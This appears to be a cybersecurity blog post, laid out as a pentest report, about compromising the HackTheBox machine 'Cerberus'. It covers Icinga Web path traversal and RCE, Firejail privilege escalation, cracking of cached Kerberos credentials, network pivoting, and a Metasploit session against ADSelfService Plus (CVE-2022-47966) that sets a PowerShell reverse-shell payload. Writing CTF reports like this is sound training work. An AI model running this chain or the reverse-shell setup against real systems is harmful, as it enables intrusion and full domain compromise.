<!doctype html>
<html lang="en">
  <head>
    <title>Cerberus // Cyber security blog</title>
    <link rel="shortcut icon" href="/favicon.ico" />
    <meta charset="utf-8" />
    
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <meta name="author" content="blackcaesar0" />
    <meta name="description" content="" />
    <link rel="stylesheet" href="/css/main.min.4566c05e79be04e22fdb60fe026660a374366519139306a7223d2cab6fb660db.css" />
    
    <link rel="stylesheet" href="/css/custom.min.5af53ff6a9267e24ee96c3f1312dd379808c5a82b25f008d9e402843955e4f21.css" />
    

    
    
  <meta name="twitter:card" content="summary">
  <meta name="twitter:title" content="Cerberus">
  <meta name="twitter:description" content="Penetration Testing Report For Cerberus Prepared by: blackcaesar0/SYN Date: [2/25/2025]
1. Executive Summary Purpose The objective of this penetration test was to assess the security posture of the target system by identifying and exploiting vulnerabilities. The main goals included:
Enumerating services and misconfigurations.
Identifying security flaws in web applications, services, or system components.
Exploiting vulnerabilities to gain unauthorized access.
Escalating privileges to administrative control.
Extracting sensitive information or flags as proof of exploitation.">

    <meta property="og:url" content="https://blackcaesar0.com/hackthebox/cerberus/">
  <meta property="og:site_name" content="Cyber security blog">
  <meta property="og:title" content="Cerberus">
  <meta property="og:description" content="Penetration Testing Report For Cerberus Prepared by: blackcaesar0/SYN Date: [2/25/2025]
1. Executive Summary Purpose The objective of this penetration test was to assess the security posture of the target system by identifying and exploiting vulnerabilities. The main goals included:
Enumerating services and misconfigurations.
Identifying security flaws in web applications, services, or system components.
Exploiting vulnerabilities to gain unauthorized access.
Escalating privileges to administrative control.
Extracting sensitive information or flags as proof of exploitation.">
  <meta property="og:locale" content="en">
  <meta property="og:type" content="article">
    <meta property="article:section" content="hackthebox">
    <meta property="article:published_time" content="2025-02-26T05:04:43+00:00">
    <meta property="article:modified_time" content="2025-02-26T05:04:43+00:00">


  </head>
  <body>
    <header class="app-header">
      <a href="/"><img class="app-header-avatar" src="/dragon.png" alt="blackcaesar0" /></a>
      <span class="app-header-title">blackcaesar0</span>
      <nav class="app-header-menu">
          <a class="app-header-menu-item" href="/">Home</a>
             - 
          
          <a class="app-header-menu-item" href="/about/">About</a>
             - 
          
          <a class="app-header-menu-item" href="/hackthebox/">Hackthebox</a>
      </nav>
      <p>Exploring cybersecurity, ethical hacking, and digital forensics—one exploit at a time.</p>
      <div class="app-header-social">
        
          <a href="https://github.com/blackcaesar0" target="_blank" rel="noreferrer noopener me">
            <svg class="icon icon-brand-github" viewBox="0 0 24 24" fill="currentColor"><title>GitHub</title><path d="M12 .297c-6.63 0-12 5.373-12 12 0 5.303 3.438 9.8 8.205 11.385.6.113.82-.258.82-.577 0-.285-.01-1.04-.015-2.04-3.338.724-4.042-1.61-4.042-1.61C4.422 18.07 3.633 17.7 3.633 17.7c-1.087-.744.084-.729.084-.729 1.205.084 1.838 1.236 1.838 1.236 1.07 1.835 2.809 1.305 3.495.998.108-.776.417-1.305.76-1.605-2.665-.3-5.466-1.332-5.466-5.93 0-1.31.465-2.38 1.235-3.22-.135-.303-.54-1.523.105-3.176 0 0 1.005-.322 3.3 1.23.96-.267 1.98-.399 3-.405 1.02.006 2.04.138 3 .405 2.28-1.552 3.285-1.23 3.285-1.23.645 1.653.24 2.873.12 3.176.765.84 1.23 1.91 1.23 3.22 0 4.61-2.805 5.625-5.475 5.92.42.36.81 1.096.81 2.22 0 1.606-.015 2.896-.015 3.286 0 .315.21.69.825.57C20.565 22.092 24 17.592 24 12.297c0-6.627-5.373-12-12-12"/></svg>
          </a>
        
          <a href="https://www.linkedin.com/in/blackcaesar0" target="_blank" rel="noreferrer noopener me">
            <svg class="icon icon-brand-linkedin" viewBox="0 0 24 24" fill="currentColor"><title>LinkedIn</title><path d="M20.447 20.452h-3.554v-5.569c0-1.328-.027-3.037-1.852-3.037-1.853 0-2.136 1.445-2.136 2.939v5.667H9.351V9h3.414v1.561h.046c.477-.9 1.637-1.85 3.37-1.85 3.601 0 4.267 2.37 4.267 5.455v6.286zM5.337 7.433c-1.144 0-2.063-.926-2.063-2.065 0-1.138.92-2.063 2.063-2.063 1.14 0 2.064.925 2.064 2.063 0 1.139-.925 2.065-2.064 2.065zm1.782 13.019H3.555V9h3.564v11.452zM22.225 0H1.771C.792 0 0 .774 0 1.729v20.542C0 23.227.792 24 1.771 24h20.451C23.2 24 24 23.227 24 22.271V1.729C24 .774 23.2 0 22.222 0h.003z"/></svg>
          </a>
        
      </div>
    </header>
    <main class="app-container">
      
  <article class="post">
    <header class="post-header">
      <h1 class ="post-title">Cerberus</h1>
      <div class="post-meta">
        <div>
          <svg class="icon icon-calendar" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><title>calendar</title><rect x="3" y="4" width="18" height="18" rx="2" ry="2"></rect><line x1="16" y1="2" x2="16" y2="6"></line><line x1="8" y1="2" x2="8" y2="6"></line><line x1="3" y1="10" x2="21" y2="10"></line></svg>
          Feb 26, 2025
        </div>
        <div>
          <svg class="icon icon-clock" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><title>clock</title><circle cx="12" cy="12" r="10"></circle><polyline points="12 6 12 12 16 14"></polyline></svg>
          4 min read
        </div>
      </div>
    </header>
    <div class="post-content">
      <h1 id="penetration-testing-report-for-cerberus"><strong>Penetration Testing Report For Cerberus</strong></h1>
<hr>
<h2 id="prepared-byblackcaesar0syn"><strong>Prepared by:</strong> <strong>blackcaesar0/SYN</strong></h2>
<p><strong>Date:</strong> [2/25/2025]</p>
<hr>
<h1 id="1-executive-summary"><strong>1. Executive Summary</strong></h1>
<h2 id="purpose"><strong>Purpose</strong></h2>
<p>The objective of this penetration test was to assess the security posture of the target system by identifying and exploiting vulnerabilities. The main goals included:</p>
<ul>
<li>
<p>Enumerating services and misconfigurations.</p>
</li>
<li>
<p>Identifying security flaws in web applications, services, or system components.</p>
</li>
<li>
<p>Exploiting vulnerabilities to gain unauthorized access.</p>
</li>
<li>
<p>Escalating privileges to administrative control.</p>
</li>
<li>
<p>Extracting sensitive information or flags as proof of exploitation.</p>
</li>
</ul>
<hr>
<h2 id="scope"><strong>Scope</strong></h2>
<ul>
<li>
<p><strong>Targets:</strong> 10.129.229.4, icinga.cerberus.local, dc.cerberus.local</p>
</li>
<li>
<p><strong>Restrictions:</strong></p>
<ul>
<li>
<p><strong>No Denial of Service (DoS/DDoS)</strong> – Availability must not be impacted.</p>
</li>
<li>
<p><strong>No Attacks Against HackTheBox Infrastructure</strong> – Testing is limited to the assigned CTF machine.</p>
</li>
</ul>
</li>
</ul>
<hr>
<h2 id="key-findings"><strong>Key Findings</strong></h2>
<ul>
<li>
<p><strong>Summary of vulnerabilities:</strong></p>
<ul>
<li><strong>Path Traversal in Icinga Web</strong> (CVE-2022-24715)</li>
<li><strong>Remote Code Execution via Web Exploit</strong></li>
<li><strong>Privilege Escalation via Firejail (CVE-2022-31214)</strong></li>
<li><strong>Kerberos Authentication with Cached Credentials</strong></li>
<li><strong>SAML Authentication Exploitation (CVE-2022-47966)</strong></li>
</ul>
</li>
<li>
<p><strong>Security posture:</strong> The system has multiple critical vulnerabilities allowing full compromise.</p>
</li>
<li>
<p><strong>Recommendations:</strong> Implement strict access control, update vulnerable software, and monitor authentication mechanisms.</p>
</li>
</ul>
<hr>
<h1 id="2-approach"><strong>2. Approach</strong></h1>
<h2 id="testing-methodology"><strong>Testing Methodology</strong></h2>
<ul>
<li><strong>Type:</strong> [Black Box]</li>
<li><strong>Phases:</strong>
<ul>
<li>Enumeration</li>
<li>Vulnerability Analysis</li>
<li>Exploitation</li>
<li>Privilege Escalation</li>
<li>Post-Exploitation</li>
<li>Reporting</li>
</ul>
</li>
</ul>
<h2 id="tools-used"><strong>Tools Used</strong></h2>
<ul>
<li><strong>Nmap</strong>, <strong>Burp Suite</strong>, <strong>Subfinder</strong>, <strong>Wfuzz</strong>, <strong>Curl</strong>, <strong>Python</strong>,<strong>Ligolo-ng</strong>, <strong>Msfconsole</strong>, <strong>Chisel</strong>, <strong>Proxychains</strong>, <strong>Evil-WinRM</strong></li>
</ul>
<hr>
<h1 id="3-summary-of-findings"><strong>3. Summary of Findings</strong></h1>
<table>
  <thead>
      <tr>
          <th><strong>Finding Name</strong></th>
          <th><strong>Severity Level</strong></th>
          <th><strong>Impact</strong></th>
          <th><strong>Remediation Summary</strong></th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>Path Traversal in Icinga Web</td>
          <td>High</td>
          <td>Credential extraction</td>
          <td>Restrict access &amp; update</td>
      </tr>
      <tr>
          <td>Remote Code Execution via Web</td>
          <td>High</td>
          <td>Full system compromise</td>
          <td>Patch affected components</td>
      </tr>
      <tr>
          <td>Privilege Escalation (Firejail)</td>
          <td>Critical</td>
          <td>Root access</td>
          <td>Update Firejail or remove SUID</td>
      </tr>
      <tr>
          <td>Kerberos Cached Credentials</td>
          <td>High</td>
          <td>Lateral movement</td>
          <td>Secure Kerberos authentication</td>
      </tr>
      <tr>
          <td>SAML Authentication Bypass</td>
          <td>Critical</td>
          <td>Compromise AD authentication</td>
          <td>Fix SAML implementation</td>
      </tr>
  </tbody>
</table>
<hr>
<h1 id="4-internal-network-compromise-walkthrough"><strong>4. Internal Network Compromise Walkthrough</strong></h1>
<h2 id="attack-chain"><strong>Attack Chain</strong></h2>
<ol>
<li><strong>Path Traversal on Icinga Web</strong>
<ul>
<li>Exploited <code>icingaweb2/lib/icinga/icinga-php-thirdparty/etc/passwd</code> to read sensitive files.</li>
<li>Retrieved database credentials: <code>matthew:IcingaWebPassword2023</code>.</li>
</ul>
</li>
<li><strong>Remote Code Execution via Web Exploit</strong>
<ul>
<li>Used CVE-2022-24715 PoC to exploit Icinga Web</li>
<li>Obtained a shell as <code>www-data</code>.</li>
</ul>
</li>
<li><strong>Network Enumeration</strong>
<ul>
<li>Identified subnet <code>172.16.22.0/28</code>.</li>
<li>Used a ping sweep script to detect live hosts.</li>
</ul>
</li>
<li><strong>Privilege Escalation</strong>
<ul>
<li>Discovered SUID binary <code>firejail</code> (CVE-2022-31214).</li>
<li>Used PoC to escalate to root inside the container.</li>
</ul>
</li>
<li><strong>Container Escape</strong>
<ul>
<li>Extracted cached Kerberos credentials from <code>/var/lib/sss/db</code>.</li>
<li>Cracked password: <code>14******</code>.</li>
<li>Utilized the initial shell access to deploy <code>ligolo-ng</code>, enabling a pivot to the internal network. This allowed access to <code>WinRM</code> via <code>evil-winrm</code>, granting access to locally running services on the main host.</li>
</ul>
</li>
<li><strong>Active Directory Attack</strong>
<ul>
<li>Identified ADSelfService Plus on port <code>9251</code>.</li>
<li>Used Metasploit module for CVE-2022-47966 to gain <code>NT AUTHORITY\SYSTEM</code>.</li>
</ul>
</li>
</ol>
<hr>
<h1 id="5-exploitation-details"><strong>5. Exploitation Details</strong></h1>
<h2 id="techniques-used"><strong>Techniques Used</strong></h2>
<ul>
<li><strong>Path Traversal:</strong>
<ul>
<li>Exploited Icinga Web to read sensitive system files.</li>
<li>Extracted database credentials.</li>
</ul>
</li>
<li><strong>Remote Code Execution via Web Exploit:</strong>
<ul>
<li>Exploited CVE-2022-24715 in Icinga Web 2 by creating SSH resource files in unintended directories, leading to arbitrary code execution and gaining a shell on the target system.</li>
</ul>
</li>
<li><strong>Privilege Escalation:</strong>
<ul>
<li>Leveraged Firejail SUID binary exploit.</li>
<li>Extracted cached AD credentials and pivoted via WinRM.</li>
</ul>
</li>
<li><strong>SAML Authentication Bypass:</strong>
<ul>
<li>Exploited ADSelfService Plus CVE-2022-47966 to gain SYSTEM access.</li>
</ul>
</li>
</ul>
<h2 id="tools-used-1"><strong>Tools Used</strong></h2>
<ul>
<li><strong>Nmap</strong> (port scanning)</li>
<li><strong>Burp Suite</strong> (web exploitation)</li>
<li><strong>Msfconsole</strong> (Metasploit for ADSelfService Plus)</li>
<li><strong>Proxychains</strong> (pivoting and lateral movement)</li>
<li><strong>Chisel</strong> (SOCKS5 proxy for internal access)</li>
<li><strong>Ligolo-ng</strong> (initial pivot tool)</li>
</ul>
<hr>
<h1 id="6-remediation-summary"><strong>6. Remediation Summary</strong></h1>
<h2 id="short-term-fixes"><strong>Short-Term Fixes</strong></h2>
<ul>
<li>Patch vulnerable services (Icinga Web, Firejail, ADSelfService Plus).</li>
<li>Restrict external access to Icinga Web and ADSelfService Plus.</li>
</ul>
<h2 id="medium-term-fixes"><strong>Medium-Term Fixes</strong></h2>
<ul>
<li>Harden SSSD configurations to prevent credential caching.</li>
<li>Implement network segmentation.</li>
</ul>
<h2 id="long-term-fixes"><strong>Long-Term Fixes</strong></h2>
<ul>
<li>Implement continuous monitoring and security audits.</li>
<li>Enforce strong authentication and role-based access control.</li>
</ul>
<hr>
<h1 id="7-technical-findings-details"><strong>7. Technical Findings Details</strong></h1>
<h2 id="finding-1-path-traversal-in-icinga-web"><strong>Finding 1: Path Traversal in Icinga Web</strong></h2>
<ul>
<li><strong>Description:</strong> The web application allows unauthorized access to system files.</li>
<li><strong>Security Impact:</strong> Attackers can retrieve credentials and escalate privileges.</li>
<li><strong>Affected Systems:</strong> <code>icinga.cerberus.local</code></li>
<li><strong>Remediation Steps:</strong> Apply latest security patches for Icinga Web.</li>
<li><strong>External References:</strong> <a href="https://www.sonarsource.com/blog/path-traversal-vulnerabilities-in-icinga-web/">SonarSource Blog</a></li>
<li><strong>Screenshots &amp; PoC:</strong> See attached appendix.</li>
</ul>
<h2 id="finding-2-remote-code-execution-via-web-exploit"><strong>Finding 2: Remote Code Execution via Web Exploit</strong></h2>
<ul>
<li><strong>Description:</strong> The web application is vulnerable to Remote Code Execution (RCE) due to improper input validation.</li>
<li><strong>Security Impact:</strong> Attackers can execute arbitrary code on the server.</li>
<li><strong>Affected Systems:</strong> <code>icinga.cerberus.local</code></li>
<li><strong>Remediation Steps:</strong> Update the web application and validate all user inputs.</li>
<li><strong>External References:</strong> <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24715">CVE-2022-24715</a></li>
<li><strong>Screenshots &amp; PoC:</strong> See attached appendix.</li>
</ul>
<hr>
<h1 id="conclusion"><strong>Conclusion</strong></h1>
<ul>
<li>The system was successfully compromised through multiple vectors.</li>
<li>Implementing patches, network segmentation, and monitoring are critical.</li>
<li>Further security hardening is recommended for Active Directory and web applications.</li>
</ul>
<hr>
<h1 id="appendix"><strong>Appendix</strong></h1>
<ul>
<li>
<p><strong>Screenshots &amp; PoC</strong></p>
<p><img src="/static/cerberus/nmap_scan.png" alt="nmap scaan">
<img src="/static/cerberus/path_traversal.png" alt="path traversal">
<img src="/static/cerberus/getting_user_password_path_traversal.png" alt="path traversal">
<img src="/static/cerberus/rce.png" alt="RCE">
<img src="/static/cerberus/shell.png" alt="shell">
<img src="/static/cerberus/suid_enum.png" alt="priv esc">
<img src="/static/cerberus/privilege_escalation.png" alt="priv esc">
<img src="/static/cerberus/root.png" alt="root access">
<img src="/static/cerberus/sssd_cached_creds.png" alt="sssd cached creds">
<img src="/static/cerberus/hash_cracking.png" alt="hash cracking">
<img src="/static/cerberus/user.png" alt="user access windows">
<img src="/static/cerberus/root_windows.png" alt="root windows"></p>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>msf6 exploit<span style="color:#f92672">(</span>multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966<span style="color:#f92672">)</span> &gt; set issuer_url http://dc.cerberus.local/adfs/services/trust
</span></span><span style="display:flex;"><span>issuer_url <span style="color:#f92672">=</span>&gt; http://dc.cerberus.local/adfs/services/trust
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>msf6 exploit<span style="color:#f92672">(</span>multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966<span style="color:#f92672">)</span> &gt; set guid 67a8d101690402dc6a6744b8fc8a7ca1acf88b2f
</span></span><span style="display:flex;"><span>guid <span style="color:#f92672">=</span>&gt; 67a8d101690402dc6a6744b8fc8a7ca1acf88b2f
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>msf6 exploit<span style="color:#f92672">(</span>multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966<span style="color:#f92672">)</span> &gt; set payload cmd/windows/powershell_reverse_tcp
</span></span><span style="display:flex;"><span>payload <span style="color:#f92672">=</span>&gt; cmd/windows/powershell_reverse_tcp
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>msf6 exploit<span style="color:#f92672">(</span>multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966<span style="color:#f92672">)</span> &gt; set lhost 10.10.14.xx
</span></span><span style="display:flex;"><span>lhost <span style="color:#f92672">=</span>&gt; 10.10.14.xx
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>msf6 exploit<span style="color:#f92672">(</span>multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966<span style="color:#f92672">)</span> &gt; set rhosts 127.0.0.1
</span></span><span style="display:flex;"><span>rhosts <span style="color:#f92672">=</span>&gt; 127.0.0.1
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>msf6 exploit<span style="color:#f92672">(</span>multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966<span style="color:#f92672">)</span> &gt; run
</span></span></code></pre></div><ul>
<li><strong>References</strong>
<ul>
<li>
<p><a href="https://www.sonarsource.com/blog/path-traversal-vulnerabilities-in-icinga-web/">SonarSource Blog</a></p>
</li>
<li>
<p><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-24715">CVE-2022-24715</a></p>
</li>
<li>
<p><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31214">CVE-2022-31214</a></p>
</li>
<li>
<p><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-47966">CVE-2022-47966</a></p>
</li>
</ul>
</li>
</ul>

    </div>
    <div class="post-footer">
      
    </div>
  </article>

    </main>
  </body>
</html>
